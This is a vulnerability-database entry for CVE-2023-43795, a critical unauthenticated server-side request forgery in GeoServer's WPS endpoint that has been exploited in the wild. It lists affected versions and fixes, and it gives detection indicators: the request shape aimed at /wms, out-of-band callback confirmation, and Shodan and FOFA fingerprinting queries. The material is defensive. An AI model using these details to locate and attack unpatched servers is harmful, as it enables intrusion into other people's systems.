cbcvebase.
CVE-2023-43795
published 2023-10-25

CVE-2023-43795: GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS)…

PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
67.72%
99.2th percentile
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.

Affected

4 ranges
VendorProductVersion rangeFixed in
geoservergeoserver< 2.22.52.22.5
geoservergeoserver
osgeogeoserver< 2.22.52.22.5
osgeogeoserver>= 2.23.0 < 2.23.22.23.2

Detection & IOCsextracted from sources · hover to see the quote

url/wms
url/geoserver/wms
otherContent-Type: application/xml (POST to /wms or /geoserver/wms with WPS XML body containing JTS:area and interactsh OOB URL)
  • Detect CVE-2023-43795 exploitation by monitoring for POST requests to /wms or /geoserver/wms with Content-Type: application/xml containing WPS Execute XML bodies referencing JTS:area process and external URLs (SSRF trigger).
  • Look for outbound HTTP callbacks from the GeoServer host following a WPS POST request — a successful SSRF will cause GeoServer to make an HTTP request to an attacker-controlled server (OOB interaction).
  • Fingerprint exposed GeoServer instances via Shodan query 'title:"GeoServer"' or FOFA query 'app="GeoServer"' to identify attack surface.
  • The vulnerability is unauthenticated (PR:N) and network-reachable (AV:N); no authentication headers are required in the exploit POST request.
  • GeoServer versions prior to 2.22.5 and 2.23.2 are vulnerable; flag any GeoServer instance reporting a version below these thresholds.
  • ·The Nuclei template uses two randomised variables (string, value) embedded in the WPS XML payload and confirmed via OOB (interactsh) callback matching — detection requires an OOB/interactsh listener; passive log-only detection will miss the confirmation step.
  • ·The template uses stop-at-first-match across the two paths (/wms, /geoserver/wms), so only one path is tested per target; ensure both paths are covered in custom detection rules.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.